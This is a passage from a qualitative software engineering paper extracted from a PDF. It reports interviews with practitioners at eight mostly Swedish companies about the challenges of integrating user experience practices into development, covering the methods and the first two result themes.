many of the challenges as unique to UX, or more severe in the case of UX. Although at a superficial level challenges of UX and other quality characteristics overlap, we differentiate these challenges at a deeper level through the five main characteristics of UX: subjective, holistic, dynamic, context- dependent and worthwhile. In particular, we identified that these characteristics have at least 20 implications (i.e. additional difficulties) for day-to-day work of practitioners. We found that 11 of these implications have been previously reported in literature. However, to the best of our knowledge, the remaining nine implications are unique to our study. These implications can explain why practitioners perceive the challenges to be more severe than for other quality characteristics. Most importantly, they can explain the industry’s lopsided focus on the pragmatic aspect of UX. Our findings can be useful for researchers in identifying new and industry-relevant research areas and for practitioners to learn from empirically investigated challenges in UX work, and base their improvement efforts on such knowledge. Identifying and investigating the overlaps underlines the importance of these challenges, and can also help finding research areas not only for enhancing UX work but also software quality in general. It also makes it easier for practitioners to spot, better understand as well as find mitigation strategies for UX, through learning from past experiences and developments in the area of software quality. Subjects Human-Computer Interaction, Software Engineering Keywords Usability, Software quality, Quality requirements, User experience, Non-functional requirements How to cite this article Kashfi et al. (2017), Integrating User eXperience practices into software development processes: implications of the UX characteristics. PeerJ Comput. Sci. 3:e130; DOI 10.7717/peerj-cs.130 https://peerj.com mailto:pariya.kashfi@chalmers.se mailto:p@puix.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.130 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.130 INTRODUCTION As the software industry has matured, the demands that society puts on the quality of software systems have increased. It is no longer enough to focus only on the many functions that a piece of software should supply. To deliver a system that is consistent and of high quality there are a large number of characteristics that need to be considered (Chung et al., 2000). Some, such as testability, are internal or relate to the development process and mainly concern developers, while others such as performance and usability, are critical for users (International Organisation for Standardisation (ISO), 2011). At an even broader level, the actual experience of the end users as they interact with the software needs to be taken into account. Recently, this widening scope of software quality characteristics has led to the introduction and study of the concept of user experience (UX). Even though different definitions of UX exist, they share the same essence: UX is a user’s holistic perception of functionality and quality characteristics of a piece of software (Hassenzahl, 2003; Wright & McCarthy, 2010; Jordan, 2002). In general, UX literature emphasizes that assuring efficiency and effectiveness during use of the software, i.e high usability, does not guarantee that the end users will have a positive experience (Hassenzahl, 2010). However, the perception of UX is generally different in academic and industrial contexts: whereas the former concentrates on hedonic aspects and emotions, the latter focuses more on functionality and usability issues (Väänänen-Vainio-Mattila, Roto & Hassenzahl, 2008). Current UX models (e.g., Hassenzahl, 2003; Wright & McCarthy, 2010) differ in their view on how various underlying elements and processes contribute to forming the end user’s overall experience with products and services. One of the well-known UX models is developed by Hassenzahl (Hassenzahl, 2003). It breaks UX down into pragmatic and hedonic attributes. Pragmatic attributes concern usability and functionality of software (e.g., clear, supporting, useful and controllable). Hedonic attributes, on the other hand, concern communicating identity, provoking memories, and providing stimulation (e.g., outstanding, impressive, exciting, and interesting). These attributes emphasize individuals’ psychological well-being. An end user’s perception of these attributes leads to a judgment about the product’s appeal (e.g., ‘‘It is good/bad’’), emotional consequences (e.g., pleasure, satisfaction) and behavioral consequences (e.g., increased time spent with the product). While pragmatic attributes concern achieving do-goals, hedonic attributes concern satisfying be-goals (Hassenzahl, 2003). Do-goals are the concrete outcome that the end user wishes to achieve whereas be-goals rest in essential human needs. To provide a better understanding of UX, Hassenzahl (Hassenzahl, 2010) emphasizes five characteristics of UX: subjective, holistic, dynamic, context-dependent and worthwhile. All software systems deliver some UX, positive or not, whether the UX has explicitly been taken into account during development. Research has shown that certain practices can increase the likelihood of delivering a desirable UX (Hassenzahl, 2010) (hereafter, UX practices). However, simply applying these practices in isolation is not enough (Abrahão et al., 2010; Ferreira, Sharp & Robinson, 2012; Ovad & Larsen, 2015). Like methods and practices used to support other software quality characteristics (Chung et al., 2000), they need to be integrated into development processes and considered throughout projects. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 2/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Nevertheless, UX is often neglected in software projects and the UX state-of-practice is immature (Abrahão et al., 2010; Isomursu et al., 2012; Law & Abrahão, 2014). In order to improve the state-of-practice, we must first understand and address challenges that practitioners face in their everyday work with UX (hereafter UX challenges). To achieve this, the distinctions and interrelations between UX, usability and other software quality characteristics must first be properly analyzed. A number of studies claim to have studied UX challenges, but their results need to be interpreted with caution because they treat UX and usability as interchangeable (e.g., Cajander, Lárusdóttir & Gulliksen, 2013; Ardito et al., 2014; Lanzilotti et al., 2015), or examine UX in isolation so its relation to usability and other software quality characteristics is not recognized (e.g., Isomursu et al., 2012; Vermeeren et al., 2010). Our study aims to complement the current body of knowledge by investigating UX challenges while explicitly differentiating UX and usability. In doing so, we discuss these challenges in relation to the unique characteristics of UX. We also contribute to the current literature by providing an explanation for the industry’s lopsided focus on the pragmatic aspect of UX. Also, in our analysis, we examine how the handling of UX compares to the handling of general software quality characteristics, especially usability. Here, we report our findings and answer the following research questions: what challenges do practitioners face when integrating UX practices into software development processes and organizations?, and how do UX challenges relate to challenges of handling software quality characteristics, in particular usability? Our findings can be useful for researchers in identifying new and industry-relevant research areas, and for practitioners in learning from empirically investigated UX challenges, and basing their improvement efforts on such knowledge. The structure of this paper is as follows: The second section provides background on the topic and summarizes the related literature. The third section describes our research methodology and presents the different research sites. The fourth section presents the results from our study: the identified themes of challenges. The fifth section discusses our findings and puts them in relation to the current literature. The last section concludes our study and suggests future research. BACKGROUND AND RELATED WORK This section elaborates on the characteristics of UX and their implications for UX work. Understanding these characteristics is important when analyzing and discussing our findings on UX challenges because it provides a basis for comparing and contrasting UX with usability and other software quality characteristics. This section also summarizes related empirical studies on software quality characteristics, in particular, usability and UX. UX is dominated by subjective aspects of human perception (Wright & McCarthy, 2010; Hassenzahl, 2010). For instance, one user may perceive particular software features as simple, novel, and admirable while another may perceive them as complicated and old. Other software quality characteristics can be treated more objectively, at least in theory (Kashfi et al., 2016). The term subjective has also been used in requirements literature to highlight that since quality characteristics are hard to measure, practitioners tend to judge them based on their personal opinion (Chung et al., 2000; Paech & Kerlow, 2004). Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 3/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Here, we use this term to refer to its meaning in the context of UX. Currently, the most efficient and feasible approach to measure perception and emotion of users is to directly gather their opinions, and let them express themselves (Law, Van Schaik & Roto, 2014). This is often performed through questionnaires or scales (e.g., AttrakDiff, Self-Assessment Manikin, Affect Gird Zimmermann, 2008). However, to gain reliable results, practitioners need to gather responses from statistically significant number of heterogeneous users (Law, Van Schaik & Roto, 2014). UX is also holistic and not totally reducible to its complexly intertwined underlying elements (Hassenzahl, 2010). UX emerges from underlying functionality and quality characteristics of software, and the user’s perception of them in a given situation (Hassenzahl, 2003). The holistic nature of UX resembles the cross-cutting nature of other quality characteristics. In both cases, more than one functionality is affected by the related requirements. However, in the case of UX, this interrelation is more complex, especially considering that UX is dynamic (aka temporal) and thus a user’s perception of the UX underlying elements changes over time (Hassenzahl & Tractinsky, 2006). Although practitioners may manipulate UX of a product through its underlying elements, they cannot guarantee a certain holistic UX (Wright & McCarthy, 2010; Hassenzahl, 2010). Practitioners can only to some extent increase the likelihood of delivering a certain UX (Hassenzahl & Tractinsky, 2006). Consequently, there is no consensus in the community on how UX should be designed or measured and whether the overall UX of a piece of software can be predicted by merely manipulating and measuring these elements (Law, Van Schaik & Roto, 2014). This is explained further below. UX is dynamic and emerges and changes over time (Hassenzahl, 2010). For example, over time, the user may find a novel feature as old, or a complex feature as simple. Hence, in designing and evaluating UX, practitioners should pay certain attention to different episodes of experience (Hassenzahl, 2010); namely expected experience (before usage), momentary experience (during usage), remembered experience (shortly after usage) and accumulated experience (over longer period of use) (Hassenzahl, 2010). Practitioners need to decide which episodes are more important than others for the software being developed and why; for instance, for an e-marketing website first impression is more important than it is for a work application. This knowledge can then help them suggest more suitable design solutions. UX research uses the term context-dependent (aka situated) to emphasize that any experience is unique, unrepeatable, and situated in its context (Wright & McCarthy, 2010). Nevertheless, experiences can be categorised because their essence is the same, i.e., they connect to essential human needs or be-goals (Hassenzahl, 2010). Implications of being context-dependent largely overlap the implications we discussed for the holistic nature of UX. UX is worthwhile (aka positive), meaning that it focuses on value and creating desirable experiences than only preventing negative ones, i.e., the focus of usability (Hassenzahl, 2010). While usability concerns removing problem, frustration, and stress (i.e., negative), UX is based on the idea that removal of dissatisfaction does not necessarily lead to satisfaction and pleasure. Through being holistic, UX addresses both satisfiers Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 4/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 (e.g., fulfilled needs, emerging emotions) and dissatisfiers (e.g., usability or technical problems) (Hassenzahl, 2010). Therefore to a large extent, the implications of being worthwhile overlap the implications of its holistic nature. Software organizations often face various challenges when dealing with quality characteristics. Berntsson Svensson et al. (2012) found that if practitioners lack understanding and knowledge about software quality characteristics, they tend to undervalue, and ignore these characteristics during development. Berntsson Svensson et al. (2012) also report that practitioners are more likely to dismiss those characteristics that are considered less important, e.g., usability is more dismissed than performance. Karlsson et al. (2007) show that functional issues are often perceived to be more important than quality issues. Based on their findings, practitioners find it difficult to deal with the dependencies between quality requirements and the functionality or other characteristics of the system. Limited knowledge and awareness has also been reported as one of the challenges to usability work (Rosenbaum, Rohn & Humburg, 2000). Bak et al. (2008) report that developers’ minds are set more on the programming aspect of the product than its usability, and they often misunderstand the term ‘‘usability evaluation’’ and often relate it to functionality. Gulliksen et al. (2004) report that limited awareness in different levels of organizations, in particular at the management level, can lead to down-prioritizing usability. They therefore suggest increasing knowledge and awareness about usability among different stakeholders and in various levels of organizations, in particular among management. Other studies show that, in general, practitioners find it more difficult to perform requirements and testing activities for quality characteristics than for functionality (Paech & Kerlow, 2004; Berntsson Svensson et al., 2012; Chung & do Prado Leite, 2009). For instance, it is generally more difficult to document quality requirements in a measurable way, or handle their dependencies to functional requirements (Berntsson Svensson et al., 2012; Karlsson et al., 2007; Borg et al., 2003; Nuseibeh & Easterbrook, 2000). Borg et al. (2003) report that lack of competencies to handle quality characteristics in projects often leads to ignoring related requirement in projects. Even if these requirements are properly quantified (specified in a measurable manner), they require suitable competencies to be tested and verified. Similar problems have also been discussed in the usability literature. Practitioners find it challenging to document measurable usability requirements (Cajander, Lárusdóttir & Gulliksen, 2013; Gulliksen et al., 2004). Ardito et al. (2014) showed that if practitioners fail to include usability in requirements documents, these requirements might be ignored later in testing. The limited access to competencies and unclear responsibilities are also reported as challenges to better usability work. For instance, Rosenbaum, Rohn & Humburg (2000) report that lack of usability professionals is one of the main obstacles organizations face concerning usability. Boivie, Gulliksen & Göransson (2006) show that even in cases when organizations have access to the right expertise, usability professionals are not sure about their responsibilities, and are uncertain as to how to contribute to the projects. Chamberlain, Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 5/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Sharp & Maiden (2006) report that power struggles rise as designers within a project defend their discipline in response to the decisions made by developers, and vice versa. Despite the differentiation of UX and usability, only a limited number of empirical studies have so far analyzed the implications of these differences. One example is the study by Vermeeren et al. (2010) that compares the challenges of evaluating usability and UX. They argue that some of UX evaluation methods need to be further improved and developed for better use in practice. According to Vermeeren et al., there is still a lack of suitable methods for evaluating UX in earlier development phases or in the period before actual use (i.e., anticipated use). They also highlight that current methods are not often practical because they need special expertise, are time consuming, or their data analysis is hard. Similarly, Isomursu et al. (2012) discuss that practitioners face difficulties in UX work compared to usability work because they do not have access to tools and methods to objectively measure UX. Law, Van Schaik & Roto (2014) explore the basic question of whether UX elements are measurable. They report that their interviewees expressed skepticism and ambivalence towards specific UX measures even if attitudes were more positive overall. They note that practitioners show opposing views on whether UX can or should be divided into composing elements, or whether it needs to be considered or measured as a whole. Results from their interviews show three categories of challenges concerning the interplay between UX evaluation and software development: (i) theoretical (measuring UX holistically or in elements, and conceptualizing long-lasting versus momentary experience), (ii) methodological (differing preferences for quantitative versus qualitative data by design- and engineering-oriented stakeholders), and (iii) practical (lack of knowledge and competencies for interpreting measurement outcomes). The participants in the Law et al.’s study emphasized they need to use a variety of media (e.g., video, TV, social media) to develop the required prototypes for measuring UX and that they often even need more than one such prototype to gather enough input for design. Their practitioners also argued that UX measures are essentially prone to fading and fabrication, or that there is a lack of means to measure the exact emotion of users at each moment (Law, Van Schaik & Roto, 2014). The work of Law, Van Schaik & Roto (2014) is duplicated in the context of the Latin American software development industry by Gerea & Herskovic (2007). They conclude that practical aspects such as cost and time play a more important role in whether or not practitioners measure UX. Other challenges reported by Gerea et al. include: limited access to the end users, and lack of knowledge and experience in UX measurement similar to what Vermeeren et al. (2010) found. Alves, Valente & Nunes (2014) investigated how UX evaluation is performed in practice (i.e., by whom, in what phases of software development, and using what tools and methods). According to their data, in around 50% of the cases UX evaluation is performed without involving the end users, and often evaluators ‘assume’ what the perception of users will be. Alves, Valente & Nunes (2014) also report that sometimes evaluations are performed by software developers that do not necessarily have the required competencies. Also, often tools and methods are selected based on cost rather than suitability for the project. Alves el al. used a list of evaluation tools and methods that are mainly usability-specific and Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 6/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 1see http://www.allaboutux.org for more UX-specific tools and methods. 2Here, we use the terms ‘UX practitioner’ and ‘non-UX practitioners’ to respectively refer to practitioners who have UX- related roles and responsibilities in the organizations and those who do not. lack UX-specific methods (e.g., Attrakdiff questionnaire (Hassenzahl, Burmester & Koller, 2003)1). This can introduce a risk to their data because practitioners might have preferred the use of a generic method such as a questionnaire for evaluating UX, without necessarily acknowledging that such generic methods may purely produce usability-related data if not used with specific attention to UX-related concepts, such as the non-tasks-related aspect of use (Hassenzahl, Diefenbach & Göritz, 2010). Studies also show that the perception of UX is generally different in academic and industrial contexts. Väänänen-Vainio-Mattila, Roto & Hassenzahl (2008) report that practitioners still focus more on functionality and usability issues in their UX work. Similarly, in Kuusinen & Väänänen-Vainio-Mattila’s (2012) study in a large software organization, ease of use and efficiency were the most often reported sources of good UX. Hence, these studies conclude that while academia concentrates more on the hedonic aspect, the industry focuses more on the pragmatic aspect. As we saw, those studies that explicitly take differences between UX and usability into account, mainly focus on evaluation activities and the role of UX measures in challenges practitioners face. They therefore do not sufficiently discuss other aspects of UX work, for instance requirements or communication and collaboration between UX and non-UX practitioners.2 In addition, those studies that report software organizations often focus more on usability than UX rarely provide an explanation for this lopsided focus. Hence, there is a need for further empirical studies that investigate the role of UX characteristics and differentiate UX from other software quality characteristics including usability. Our study is a response to this research gap. METHODS We have conducted an explorative, qualitative study (Braun & Clarke, 2006) to investigate the challenges to integrating UX practices into software development processes. Below, we detail our research approach by describing the different companies where we conducted interviews, how the data was collected, and our approach to data analysis. Research sites We selected a variety of companies with different characteristics for our study in order to improve the generalizability of our findings (Runeson & Höst, 2008). Table 1 shows an overview of these companies and their main characteristics and labels them (A–H) for easier reference later in the paper. The companies span various domains (company type) and vary in size (number of employees). We approached both consultancy and product development companies in order to cover both perspectives. Both A and E are well-known consultancy companies in Sweden, while B, C, D, and H are well-known product development companies in Sweden. Throughout the study, we were introduced to additional companies by our interviewees, and we also included a number of interviewees from those companies (F and G). Company F is an international consultancy company, also active in Sweden. Company G is an American company. Only one of the companies (E) was previously known to the authors based on previous research collaborations. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 7/40 http://www.allaboutux.org https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Table 1 Overview of the companies that participated in the study. Company type Number of employees (A) IT services, consultancy & outsourcing >130,000 (B) Defense & security ∼14,000 (C) Wireless solutions & network testing ∼1,800 (D) Systems & software development company ∼120 (E) User experience consultancy & training ∼50 (F) IT & management consultancy >1,300 (G) User experience & Usability consultancy 34 (H) Telecommunication ∼114,000 Table 2 The interviewees who participated in this study. Code Roles & responsibilities Field of education Industrial experience (since) A-1 Business developer, UX lead & interaction designer Cartoonist 2010 A-2 Interaction designer & UX designer Computer science & interaction design 2005 A-3 Project leader & developer Computer science 2006 A-4 Art director & graphical designer Photography 1996 B-1 Software engineer & project manager Psychology & electrical engineering 2007 B-2 Technical product manager Computer science 2000 B-3 Senior project manager Computer science 1995 B-4 Product manager & project manager Computer science 2006 B-5 Technical project manager & requirements analyst Computer science 2002 B-6 System developer & interaction designer Computer science & interaction design 2011 C-1 UX lead & interaction designer Cognitive science 1996 D-1 System developer & requirements analyst Computer science 2000 E-1 Business developer, UX lead & interaction designer Software engineering 1983 F-1 UX lead & human factors specialist Cognitive science 1989 G-1 Manager, design strategist & UX lead Design 1999 H-1 Manager, design strategist & UX designer Multimedia & interaction design 1997 H-2 UX designer Multimdeia & design 1996 Data collection The aim of the interviews was presented to our main contacts in each company to assure selected interviewees were suitable for our research. The selected practitioners (see Table 2) represent technical (e.g., developers), design (e.g., interaction designers), and management roles. We had the option to ask for more interviewees, but since the study was explorative, after 17 interviews we were confident that we had covered the major challenges from a sufficiently broad range of perspectives. We conducted semi-structured interviews (Flick, 2009) to collect more of the interviewees’ viewpoints, which was important to the explorative nature of our study. The questions covered different phases of development processes, and also the concept of UX and how it differed from usability in the interviewee’s eye. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 8/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Transcribing the interviews Segmenting the interview transcripts e.g. initial codes: - UX vs. usability - motives - definition - tools and methods Identifying the key points in each segment Coding the segments Conducting the interviews Data collection Data analysis Creating the initial set of codes Creating the interview guide Literature review Formulating the research question Preparation Creating new codes Categorizing the coded segments Creating the themes a segment per row in the excel file coding was performed in an excel file: each row was coded, using separate codes in different columns excel macros were used to generate separate sheets for each code from different interview transcripts Challenge Code Key point Interview transcript Theme Levels of data abstraction Figure 1 Process of data gathering and analysis. Full-size DOI: 10.7717/peerjcs.130/fig-1 We prepared an interview guide with a set of pre-designed questions based on the knowledge gained from literature. In each interview, questions were rephrased, added, or skipped based on the interviewee’s background and responses. Each interview covered all phases of software development, the activities performed in each phase, and the tools and methods applied. Thirteen of the interviews were conducted face-to-face, and four via video or telephone conference. Each interview lasted between 30–60 min, and was recorded and transcribed. The interviews were all performed in the spring of 2012. Data analysis Figure 1 provides an overview of the data gathering and analysis process. We applied thematic analysis as described in Braun and Clarke (Braun & Clarke, 2006) to encode and analyze the interview data. We segmented the interview transcriptions into meaningful paragraphs or sentences in a way that each of these segments presented one concept. We then coded these segments (Braun & Clarke, 2006). We used Microsoft Excel to document the coded data. Each interview transcript was recorded in a separate sheet. Segments of this transcript was recorded in separate rows, and different codes were assigned to each segment in separated Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 9/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-1 http://dx.doi.org/10.7717/peerj-cs.130 columns, following that segment. After coding, categories of challenges, i.e., themes, emerged as we put together similar concepts presented in the coded segments. A mind-map of challenges and categories was created to better identify and visualize the relations. We created a pilot list of codes (Braun & Clarke, 2006) that was iteratively refined. The initial codes captured challenges and their context and included: definition, challenges, solutions, tools and methods, evaluations, requirements, UX versus usability, and activities. As the interviewees mentioned various challenges, we asked follow-up questions to better understand attempted solutions, or previous experiences with usability or other quality characteristics in relation to similar challenges. When the interviewees used different terminologies, or had limited knowledge concerning UX or usability, we mapped their statements to the relevant concepts based on the definitions of the concepts in literature. For instance this statement: ‘‘There is a bit of confusion in the field and in the company as well, what’s the difference? design is design’’ (A-1) mapped to these key points: definition of UX is not clear, and practitioners do not know what UX exactly means. This statement was then coded as ‘challenge’, and ‘definition’. Segments that related to understanding and definition of UX, such as this example, resulted in the theme ‘lack of consensus on definition and construct of UX’. Threats to validity Threats to validity are outlined and discussed based on the classification by Runeson and Höst (Runeson & Höst, 2008): Selection process of subjects for interviews can cause a threat to construct validity. Selection bias is always present when subjects are not fully randomly sampled. However, our subjects were selected based on their role, experience and availability so there is little more we could do to alleviate this threat. The presence of a researcher may influence the behavior and response of the subjects. This threat was alleviated somewhat by the guarantee of confidentiality of the data but is an inherent limitation of the research method used. In any empirical study, incorrect data is a threat to internal validity. Interviews were audio recorded to mitigate this threat. The authors also analyzed the material in several rounds of independent as well as joint sessions to gradually reach consensus on the intended meaning of the respondents. We also shared the results of our analysis with the interviewees to validate and confirm the findings. External validity concerns the ability to generalize the results beyond the actual study. Since the interviews are just a sample from a potentially very large population, they should be interpreted with some caution. We sampled a number of different organizations in different industrial domains to decrease the effect of this threat. In addition, the majority of the organizations we studied are Swedish (exceptions are G (American), and F (Dutch)), and the culture of Swedish software industry can have an impact on how the studied organizations perceive and address UX or other quality characteristics. This distribution however is not sufficient to draw any conclusions based on the cultural differences of these companies, and in interpretation of findings this matter needs to be taken into consideration. Qualitative studies rarely attempt to generalize beyond the actual setting and are more concerned with explaining and understanding the phenomena under study. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 10/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Theme 1: Lack of consensus on definition & construct of UX Theme 2: Lack of consensus on the value of UX Theme 3: Low industrial impact of UX models, tools & methods Theme 4: Focus on objectively measurable aspects of software Theme 5: Difficulties in engineering UX-related requirements Theme 6: Focus on evaluating functionality & usability, not UX Theme 7: Lack of consensus on UX related competencies & responsibilities Theme 8: Communication & collaboration gap between UX & non-UX practitioners Themes of challenges more tactical more fundamental inclu des explains Figure 2 The identified themes of challenges. Full-size DOI: 10.7717/peerjcs.130/fig-2 Another concern is that our data gathering was performed in the spring of 2012. Therefore, our data may not reflect today’s UX state-of-practice in the studied organizations. However, the data is valid when interpreted in its own time frame. Also, to minimize the effect of the time frame on our analysis, we have included recent studies published since 2012 when discussing the results. Another threat concerns reliability, the extent to which the data and analysis are dependent on the specific researchers. Although the coding process is performed by the first author, to improve reliability of the generated themes, the three authors individually and independently conducted a pilot coding of these segments using an initial coding guide as explained above. The outcomes of the pilot coding were discussed in several sessions with all three authors, and the differences in coding were analyzed and resolved. Also, we had carefully designed the interviews before running them. We also defined the coding process after the interviews and before analyzing the data. The initial codes were therefore identified mainly based on observed interview responses. We also ensured the themes are not imposed on the data rather emerged from it. RESULTS This section presents eight themes of challenges that emerged from the interview data (see Fig. 2). These themes are described and supported by the interviewees’ quotations. Each quotation is provided with the interviewee’s code, and labeled either ‘SE’ or ‘HCI’ to reflect the community to which the interviewee belongs. This helps better understanding of the current state of practice from these two perspectives. Theme 1. Lack of consensus on definition and construct of UX Our data shows that practitioners’ understanding of the concept of UX differs and is, in some cases, even inconsistent and contradictory (see Fig. 3). According to the respondents, UX is a new concept and there is a lack of general agreement on its meaning in the field in Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 11/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-2 http://dx.doi.org/10.7717/peerj-cs.130 Theme 1: Lack of consensus on definition & construct of UX Practitioners have different understandings of UX Practitioners have inconsistent & contradictory views on UX Customers have limited knowledge about UX There is a lack of consensus on meaning of UX both in research & practice UX is seen as equal to usability or IxD includes Figure 3 Challenges concerning definition and construct of UX (Theme 1). Full-size DOI: 10.7717/peerjcs.130/fig-3 general, and among practitioners within organizations in particular. In some practitioners’ view, UX is the same as usability or Interaction Design (IxD) despite the fact that UX includes the user’s subjective perception and overall experience. The lopsided focus on usability and IxD can be explained by their relative simplicity: ‘‘I think discussions at large when it comes to UX design at common ground is still about IxD and usability. Usability is easy to talk about and everybody understands it.’’ (A-1/HCI). One of the interviewees referred to UX as ‘‘just another buzz word’’ (E-1/HCI). In her view, UX contains the same concepts that have been around for a long time under other names such as usability and emotional design. On the other hand, some practitioners explicitly differentiated between UX and usability. One of the participants emphasized that usability is ‘‘a minor subset of UX’’ and added: ‘‘I’ve never, ever called myself a usability expert, and I would never do that.’’ (H-1/HCI). Similarly, another practitioner stressed that UX is not about IxD and has a much broader perspective: ‘‘[IxD] is just the end results, we do not call ourselves interaction designers, because that is only 10% of our work but that is an important element because that is the most visual part of our work .’’ (F-1/HCI). Similarly, another practitioner referred to UX as: ‘‘a wholeness with the emotional, social, economical, functional, and technical parts.’’ (A-4/HCI). Another practitioner described UX as: ‘‘pretty much everything that affects a user’s interaction with a product.’’ (H-2/HCI). He further emphasized UX is ‘‘the whole package’’ and usability is only one part of it. A number of practitioners stated that UX is a ‘broad’ and ‘holistic’ concept covering not only the user perspective, but also the business perspective. While the latter looks into how the design contributes to achieving business goals, the former assures satisfying the end users’ needs. The user perspective includes aspects such as ‘emotions’, ‘values’ and ‘preferences’. Some practitioners related UX to the ‘why’ behind the functional requirements and the software in general. For instance, one practitioner described this through three main questions of ‘what’ to build, ‘how’ to build it, and ‘why’ to build it (A-4/HCI). Some practitioners related UX to the GUI by stating that it is about ‘‘the cool things, the new things, the flashy things.’’ (A-3/SE). In their view, UX is mainly about emotions and aesthetics therefore not applicable to all types of applications, for instance ‘productivity applications’. In general, the practitioners with technical backgrounds showed limited knowledge about UX. Their knowledge was often limited to cognitive aspects of design, i.e., usability. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 12/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-3 http://dx.doi.org/10.7717/peerj-cs.130 Theme 2: Lack of consensus on the value of UX B2B businesses do not value UX enough UX is often down- prioritized to functionality Management does not value UX, e.g. as part of the business strategy Customers down- proritize UX & do not value it Stakeholders have different views on the importance of UX includ es Business stakeholders do not value UX Cost of UX is not justified for customers Figure 4 Challenges concerning value of UX (Theme 2). Full-size DOI: 10.7717/peerjcs.130/fig-4 One of the technical managers stated: ‘‘ [our customers] talk about increased workload. That is a negative thing. I don’t know if that qualifies as UX.’’ (B-2/SE). On the other hand, a UX practitioners emphasized that UX ‘‘goes beyond cognitive aspects of design’’ (E-1/HCI), the main focus of usability. The participants also discussed that customers’ limited knowledge about UX is a challenge. Customers who have heard about UX can be too ambitious regarding emotional and non-task-related user needs. Customers’ limited knowledge also means that they often specify the related requirements vaguely and using inconsistent and subjective terminology. They often indicate a need for quality characteristics such as ‘cool’, ‘fun’, or ‘high-tech’ mostly because they are affected by such ‘buzz words’ while they do not necessarily know what these terms actually mean. Practitioners emphasized that to prevent misunderstandings UX-related requirements should be refined early on to concrete requirements and specified in a measurable way. Regarding this one of the interviewees said: ‘‘usually they say ‘we want something like that app’, ‘we want it to be cool and high tech’. Then you have to initiate a dialog to find out what that means for this particular customer.’’ (A-1/HCI). Theme 2. Lack of consensus on the value of UX Generally speaking, our data shows that various stakeholders have different views on whether UX is important or not (see Fig. 4). A group of the interviewees believed UX of software is increasingly important because of the growing general importance of software in recent decades. Interactions users had with earlier software were limited to command-line, and software was mainly built to support existing manual work. Software is now a large part of life, and users are exposed to a variety of interaction styles (mouse, touch, etc.), and experiences. This exposure to various software systems affects the experience and Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 13/40 https://peerj.com https://doi.org/10.7717/peerjcs.130/fig-4 http://dx.doi.org/10.7717/peerj-cs.130 expectations of users. Regarding this, one practitioner said: ‘‘Users are meeting a lot of good things, and they are expecting good things all the time.’’ (E-1/HCI). According to the practitioners, various businesses are learning from successful products in the market. This has inspired not only market-driven but also business-to-business software projects. This is supported by one of the interviewees saying: ‘‘A lot of business- to-business applications are being informed by business-to-consumer apps.’’ (G-1/HCI). In particular, in cases where a product has competitors, the motivation to improve UX increases. One of the practitioners argued that UX is now a ‘differentiator’: ‘‘Today I think that many companies do usable products, in order to distinguish a brand or a product we need to add an extra level to the product so that is really what I call UX. We need to take more things into account, e.g., emotions, and that it needs to look great, and it is not only about being usable.’’ (A-2/HCI). In market-driven products, branding, emotional concerns, and relations with end users are important. Therefore, in our participants’ views, these businesses are often more concerned about UX. Another interviewee argued that for market-driven software, in particular game development, UX is ‘‘part of the common practice’’ (A-1/HCI) while this is not the case for business-to-business software. He further emphasized this approach of market-driven projects should be ‘‘transferred to other projects’’ as well. Some of the practitioners emphasized that UX is an important software quality characteristic that needs to be taken into account more in projects. However, in some functionality-focused organizations, UX is considered something ‘‘on the side’’ and not a core concept or value. According to these practitioners, the business units often focus on functionality and not UX. As one of the interviewees emphasized, in this case the business unit is not ‘‘that concerned with the look and feel’’ (A-4/HCI). The practitioners were generally positive that more and more organizations, even the technology-focused ones are learning about UX and the importance of taking it into account in their products. For instance, one practitioner said that in their company, business units now show less resistance towards UX and the importance of UX ‘‘starts to be visible’’ (H-2/HCI) to these units. In addition, the interviewees emphasized managements’ preferences, values, and motivations also influence UX work in organizations. Regarding this, one practitioner stated: ‘‘I think it’s sometimes just the reason people go into business in the first place ...the people who are in it because they think that their product or service solves a real problem, they generally care about UX more.’’ (G-1/HCI). This interviewee further discussed how individuals, in particular higher management, play an important role in whether UX is a priority in an organization or not. One of the interviewees stated that the inputs from their UX group in research and development are ignored by business units because some of the ideas are ahead of their time while these units tend to focus on near future: ‘‘business units are occupied with their very close, near time results so they look at what they can sell now.’’ (H-2/HCI). He further highlighted that some of these previously rejected UX ideas are now being incorporated in the products and are getting support from management because competitors now implement similar ideas. Another challenge is that customers often resist taking on the costs of performing UX work. In practitioners’ view, often customers are not aware of UX and its value, and Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 14/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 in particular how it differs from usability and IxD. Regarding difficulties in convincing customers, a practitioner said: ‘‘It can be hard ...If you have to have three weeks extra to make the graphics work in a certain way, they might think it’s unnecessary. And maybe the software’s going to work fine, but if they made these extra efforts or put in this extra amount of money, they would have actually gone much, much further maybe.’’ (A-4/HCI). As a way to convince customers to agree to the cost of UX practices, one of the organizations (A) uses examples of successful products in the 